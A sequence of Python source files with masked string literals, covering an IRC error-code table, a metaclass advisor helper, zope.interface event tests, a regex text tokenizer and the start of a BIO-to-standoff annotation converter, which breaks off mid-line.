<EOL> ERR_USERSDISABLED = '<STR_LIT>' <EOL> ERR_NOTREGISTERED = '<STR_LIT>' <EOL> ERR_NEEDMOREPARAMS = '<STR_LIT>' <EOL> ERR_ALREADYREGISTRED = '<STR_LIT>' <EOL> ERR_NOPERMFORHOST = '<STR_LIT>' <EOL> ERR_PASSWDMISMATCH = '<STR_LIT>' <EOL> ERR_YOUREBANNEDCREEP = '<STR_LIT>' <EOL> ERR_YOUWILLBEBANNED = '<STR_LIT>' <EOL> ERR_KEYSET = '<STR_LIT>' <EOL> ERR_CHANNELISFULL = '<STR_LIT>' <EOL> ERR_UNKNOWNMODE = '<STR_LIT>' <EOL> ERR_INVITEONLYCHAN = '<STR_LIT>' <EOL> ERR_BANNEDFROMCHAN = '<STR_LIT>' <EOL> ERR_BADCHANNELKEY = '<STR_LIT>' <EOL> ERR_BADCHANMASK = '<STR_LIT>' <EOL> ERR_NOCHANMODES = '<STR_LIT>' <EOL> ERR_BANLISTFULL = '<STR_LIT>' <EOL> ERR_NOPRIVILEGES = '<STR_LIT>' <EOL> ERR_CHANOPRIVSNEEDED = '<STR_LIT>' <EOL> ERR_CANTKILLSERVER = '<STR_LIT>' <EOL> ERR_RESTRICTED = '<STR_LIT>' <EOL> ERR_UNIQOPPRIVSNEEDED = '<STR_LIT>' <EOL> ERR_NOOPERHOST = '<STR_LIT>' <EOL> ERR_NOSERVICEHOST = '<STR_LIT>' <EOL> ERR_UMODEUNKNOWNFLAG = '<STR_LIT>' <EOL> ERR_USERSDONTMATCH = '<STR_LIT>' <EOL> symbolic_to_numeric = { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : 
'<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> 
"<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> } <EOL> numeric_to_symbolic = { } <EOL> for k , v in symbolic_to_numeric . items ( ) : <EOL> numeric_to_symbolic [ v ] = k </s>
<s> """<STR_LIT>""" <EOL> from types import FunctionType <EOL> try : <EOL> from types import ClassType <EOL> except ImportError : <EOL> __python3 = True <EOL> else : <EOL> __python3 = False <EOL> import sys <EOL> def getFrameInfo ( frame ) : <EOL> """<STR_LIT>""" <EOL> f_locals = frame . f_locals <EOL> f_globals = frame . f_globals <EOL> sameNamespace = f_locals is f_globals <EOL> hasModule = '<STR_LIT>' in f_locals <EOL> hasName = '<STR_LIT>' in f_globals <EOL> sameName = hasModule and hasName <EOL> sameName = sameName and f_globals [ '<STR_LIT>' ] == f_locals [ '<STR_LIT>' ] <EOL> module = hasName and sys . modules . get ( f_globals [ '<STR_LIT>' ] ) or None <EOL> namespaceIsModule = module and module . __dict__ is f_globals <EOL> if not namespaceIsModule : <EOL> kind = "<STR_LIT>" <EOL> elif sameNamespace and not hasModule : <EOL> kind = "<STR_LIT>" <EOL> elif sameName and not sameNamespace : <EOL> kind = "<STR_LIT:class>" <EOL> elif not sameNamespace : <EOL> kind = "<STR_LIT>" <EOL> else : <EOL> kind = "<STR_LIT>" <EOL> return kind , module , f_locals , f_globals <EOL> def addClassAdvisor ( callback , depth = <NUM_LIT:2> ) : <EOL> """<STR_LIT>""" <EOL> if __python3 : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> frame = sys . _getframe ( depth ) <EOL> kind , module , caller_locals , caller_globals = getFrameInfo ( frame ) <EOL> previousMetaclass = caller_locals . get ( '<STR_LIT>' ) <EOL> if __python3 : <EOL> defaultMetaclass = caller_globals . get ( '<STR_LIT>' , type ) <EOL> else : <EOL> defaultMetaclass = caller_globals . 
get ( '<STR_LIT>' , ClassType ) <EOL> def advise ( name , bases , cdict ) : <EOL> if '<STR_LIT>' in cdict : <EOL> del cdict [ '<STR_LIT>' ] <EOL> if previousMetaclass is None : <EOL> if bases : <EOL> meta = determineMetaclass ( bases ) <EOL> else : <EOL> meta = defaultMetaclass <EOL> elif isClassAdvisor ( previousMetaclass ) : <EOL> meta = previousMetaclass <EOL> else : <EOL> meta = determineMetaclass ( bases , previousMetaclass ) <EOL> newClass = meta ( name , bases , cdict ) <EOL> return callback ( newClass ) <EOL> advise . previousMetaclass = previousMetaclass <EOL> advise . callback = callback <EOL> caller_locals [ '<STR_LIT>' ] = advise <EOL> def isClassAdvisor ( ob ) : <EOL> """<STR_LIT>""" <EOL> return isinstance ( ob , FunctionType ) and hasattr ( ob , '<STR_LIT>' ) <EOL> def determineMetaclass ( bases , explicit_mc = None ) : <EOL> """<STR_LIT>""" <EOL> meta = [ getattr ( b , '<STR_LIT>' , type ( b ) ) for b in bases ] <EOL> if explicit_mc is not None : <EOL> meta . append ( explicit_mc ) <EOL> if len ( meta ) == <NUM_LIT:1> : <EOL> return meta [ <NUM_LIT:0> ] <EOL> candidates = minimalBases ( meta ) <EOL> if not candidates : <EOL> assert ( not __python3 ) <EOL> return ClassType <EOL> elif len ( candidates ) > <NUM_LIT:1> : <EOL> raise TypeError ( "<STR_LIT>" , bases ) <EOL> return candidates [ <NUM_LIT:0> ] <EOL> def minimalBases ( classes ) : <EOL> """<STR_LIT>""" <EOL> if not __python3 : <EOL> classes = [ c for c in classes if c is not ClassType ] <EOL> candidates = [ ] <EOL> for m in classes : <EOL> for n in classes : <EOL> if issubclass ( n , m ) and m is not n : <EOL> break <EOL> else : <EOL> if m in candidates : <EOL> candidates . remove ( m ) <EOL> candidates . append ( m ) <EOL> return candidates </s>
<s> import unittest <EOL> class _SilencePy3Deprecations ( unittest . TestCase ) : <EOL> def failUnless ( self , expr ) : <EOL> return self . assertTrue ( expr ) <EOL> def failIf ( self , expr ) : <EOL> return self . assertFalse ( expr ) <EOL> class _ConformsToIObjectEvent ( object ) : <EOL> def _makeOne ( self , target = None ) : <EOL> if target is None : <EOL> target = object ( ) <EOL> return self . _getTargetClass ( ) ( target ) <EOL> def test_class_conforms_to_IObjectEvent ( self ) : <EOL> from zope . interface . interfaces import IObjectEvent <EOL> from zope . interface . verify import verifyClass <EOL> verifyClass ( IObjectEvent , self . _getTargetClass ( ) ) <EOL> def test_instance_conforms_to_IObjectEvent ( self ) : <EOL> from zope . interface . interfaces import IObjectEvent <EOL> from zope . interface . verify import verifyObject <EOL> verifyObject ( IObjectEvent , self . _makeOne ( ) ) <EOL> class _ConformsToIRegistrationEvent ( _ConformsToIObjectEvent ) : <EOL> def test_class_conforms_to_IRegistrationEvent ( self ) : <EOL> from zope . interface . interfaces import IRegistrationEvent <EOL> from zope . interface . verify import verifyClass <EOL> verifyClass ( IRegistrationEvent , self . _getTargetClass ( ) ) <EOL> def test_instance_conforms_to_IRegistrationEvent ( self ) : <EOL> from zope . interface . interfaces import IRegistrationEvent <EOL> from zope . interface . verify import verifyObject <EOL> verifyObject ( IRegistrationEvent , self . _makeOne ( ) ) <EOL> class ObjectEventTests ( _SilencePy3Deprecations , _ConformsToIObjectEvent ) : <EOL> def _getTargetClass ( self ) : <EOL> from zope . interface . interfaces import ObjectEvent <EOL> return ObjectEvent <EOL> def test_ctor ( self ) : <EOL> target = object ( ) <EOL> event = self . _makeOne ( target ) <EOL> self . failUnless ( event . 
object is target ) <EOL> class RegistrationEventTests ( _SilencePy3Deprecations , <EOL> _ConformsToIRegistrationEvent ) : <EOL> def _getTargetClass ( self ) : <EOL> from zope . interface . interfaces import RegistrationEvent <EOL> return RegistrationEvent <EOL> def test___repr__ ( self ) : <EOL> target = object ( ) <EOL> event = self . _makeOne ( target ) <EOL> r = repr ( event ) <EOL> self . assertEqual ( r . splitlines ( ) , <EOL> [ '<STR_LIT>' , repr ( target ) ] ) <EOL> class RegisteredTests ( _SilencePy3Deprecations , <EOL> _ConformsToIRegistrationEvent ) : <EOL> def _getTargetClass ( self ) : <EOL> from zope . interface . interfaces import Registered <EOL> return Registered <EOL> def test_class_conforms_to_IRegistered ( self ) : <EOL> from zope . interface . interfaces import IRegistered <EOL> from zope . interface . verify import verifyClass <EOL> verifyClass ( IRegistered , self . _getTargetClass ( ) ) <EOL> def test_instance_conforms_to_IRegistered ( self ) : <EOL> from zope . interface . interfaces import IRegistered <EOL> from zope . interface . verify import verifyObject <EOL> verifyObject ( IRegistered , self . _makeOne ( ) ) <EOL> class UnregisteredTests ( _SilencePy3Deprecations , <EOL> _ConformsToIRegistrationEvent ) : <EOL> def _getTargetClass ( self ) : <EOL> from zope . interface . interfaces import Unregistered <EOL> return Unregistered <EOL> def test_class_conforms_to_IUnregistered ( self ) : <EOL> from zope . interface . interfaces import IUnregistered <EOL> from zope . interface . verify import verifyClass <EOL> verifyClass ( IUnregistered , self . _getTargetClass ( ) ) <EOL> def test_instance_conforms_to_IUnregistered ( self ) : <EOL> from zope . interface . interfaces import IUnregistered <EOL> from zope . interface . verify import verifyObject <EOL> verifyObject ( IUnregistered , self . _makeOne ( ) ) <EOL> def test_suite ( ) : <EOL> return unittest . TestSuite ( ( <EOL> unittest . makeSuite ( ObjectEventTests ) , <EOL> unittest . 
makeSuite ( RegistrationEventTests ) , <EOL> unittest . makeSuite ( RegisteredTests ) , <EOL> unittest . makeSuite ( UnregisteredTests ) , <EOL> ) ) </s>
<s> from __future__ import with_statement <EOL> import re <EOL> INPUT_ENCODING = "<STR_LIT>" <EOL> OUTPUT_ENCODING = "<STR_LIT>" <EOL> DEBUG_GTB_TOKENIZATION = False <EOL> PTB_ESCAPES = [ ( '<STR_LIT:(>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:)>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:[>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:]>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:{>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:}>' , '<STR_LIT>' ) , <EOL> ] <EOL> def PTB_escape ( s ) : <EOL> for u , e in PTB_ESCAPES : <EOL> s = s . replace ( u , e ) <EOL> return s <EOL> def PTB_unescape ( s ) : <EOL> for u , e in PTB_ESCAPES : <EOL> s = s . replace ( e , u ) <EOL> return s <EOL> __initial , __repeated , __final = [ ] , [ ] , [ ] <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . 
compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . 
compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT:U+0020>' ) ) <EOL> def _tokenize ( s ) : <EOL> """<STR_LIT>""" <EOL> for r , t in __initial : <EOL> s = r . sub ( t , s ) <EOL> while True : <EOL> o = s <EOL> for r , t in __repeated : <EOL> s = r . sub ( t , s ) <EOL> if o == s : break <EOL> for r , t in __final : <EOL> s = r . 
sub ( t , s ) <EOL> return s <EOL> def tokenize ( s , ptb_escaping = False , use_single_quotes_only = False , <EOL> escape_token_internal_parens = False ) : <EOL> """<STR_LIT>""" <EOL> if DEBUG_GTB_TOKENIZATION : <EOL> orig = s <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:U+0020>' , s ) <EOL> m = re . match ( r'<STR_LIT>' , s ) <EOL> assert m , "<STR_LIT>" % s <EOL> s , s_end = m . groups ( ) <EOL> s = re . sub ( r'<STR_LIT:$>' , '<STR_LIT:U+0020>' , s ) <EOL> if ptb_escaping : <EOL> if use_single_quotes_only : <EOL> s = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' + "<STR_LIT>" , s ) <EOL> else : <EOL> s = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , s ) <EOL> else : <EOL> s = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , s ) <EOL> s = _tokenize ( s ) <EOL> if ptb_escaping : <EOL> if use_single_quotes_only : <EOL> s = s . replace ( '<STR_LIT:">' , "<STR_LIT>" ) <EOL> else : <EOL> s = s . replace ( '<STR_LIT:">' , "<STR_LIT>" ) <EOL> else : <EOL> s = s . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> if not ptb_escaping : <EOL> if not escape_token_internal_parens : <EOL> s = PTB_unescape ( s ) <EOL> else : <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:(>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:)>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:[>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:]>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:{>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:}>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT:U+0020>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , s ) <EOL> if DEBUG_GTB_TOKENIZATION : <EOL> r1 = PTB_unescape ( orig . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( "<STR_LIT:'>" , '<STR_LIT>' ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> r2 = PTB_unescape ( s . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . 
replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( "<STR_LIT:'>" , '<STR_LIT>' ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if r1 != r2 : <EOL> print >> sys . stderr , "<STR_LIT>" % ( orig , s ) <EOL> s = orig <EOL> return s + s_end <EOL> def __argparser ( ) : <EOL> import argparse <EOL> ap = argparse . ArgumentParser ( description = "<STR_LIT>" ) <EOL> ap . add_argument ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> ap . add_argument ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> ap . add_argument ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> ap . add_argument ( "<STR_LIT>" , metavar = "<STR_LIT>" , nargs = "<STR_LIT:*>" , help = "<STR_LIT>" ) <EOL> return ap <EOL> def main ( argv ) : <EOL> import sys <EOL> import codecs <EOL> arg = __argparser ( ) . parse_args ( argv [ <NUM_LIT:1> : ] ) <EOL> ptb_escaping , use_single_quotes_only , escape_token_internal_parens = False , False , False <EOL> if arg . ptb : <EOL> ptb_escaping = True <EOL> if arg . mccc : <EOL> ptb_escaping = True <EOL> use_single_quotes_only = True <EOL> if arg . sp : <EOL> escape_token_internal_parens = True <EOL> if len ( arg . files ) == <NUM_LIT:0> : <EOL> arg . files . append ( '<STR_LIT>' ) <EOL> for fn in arg . files : <EOL> try : <EOL> with codecs . open ( fn , encoding = INPUT_ENCODING ) as f : <EOL> for l in f : <EOL> t = tokenize ( l , ptb_escaping = ptb_escaping , <EOL> use_single_quotes_only = use_single_quotes_only , <EOL> escape_token_internal_parens = escape_token_internal_parens ) <EOL> sys . stdout . write ( t . encode ( OUTPUT_ENCODING ) ) <EOL> except Exception , e : <EOL> print >> sys . stderr , "<STR_LIT>" , fn , "<STR_LIT::>" , e <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> from __future__ import with_statement <EOL> import sys <EOL> import re <EOL> import os <EOL> import codecs <EOL> class taggedEntity : <EOL> def __init__ ( self , startOff , endOff , eType , idNum , fullText ) : <EOL> self . startOff = startOff <EOL> self . endOff = endOff <EOL> self . eType = eType <EOL> self . idNum = idNum <EOL> self . fullText = fullText <EOL> self . eText = fullText [ startOff : endOff ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . idNum , self . eType , self . startOff , <EOL> self . endOff , self . eText ) <EOL> def check ( self ) : <EOL> assert "<STR_LIT:\n>" not in self . eText , "<STR_LIT>" % self . eText <EOL> assert self . eText == self . eText . strip ( ) , "<STR_LIT>" % self . eText <EOL> def BIO_to_standoff ( BIOtext , reftext , tokenidx = <NUM_LIT:2> , tagidx = - <NUM_LIT:1> ) : <EOL> BIOlines = BIOtext . split ( '<STR_LIT:\n>' ) <EOL> return BIO_lines_to_standoff ( BIOlines , reftext , tokenidx , tagidx ) <EOL> next_free_id_idx = <NUM_LIT:1> <EOL> def BIO_lines_to_standoff ( BIOlines , reftext , tokenidx = <NUM_LIT:2> , tagidx = - <NUM_LIT:1> ) : <EOL> global next_free_id_idx <EOL> taggedTokens = [ ] <EOL> ri , bi = <NUM_LIT:0> , <NUM_LIT:0> <EOL> while ( ri < len ( reftext ) ) : <EOL> if bi >= len ( BIOlines ) : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> break <EOL> BIOline = BIOlines [ bi 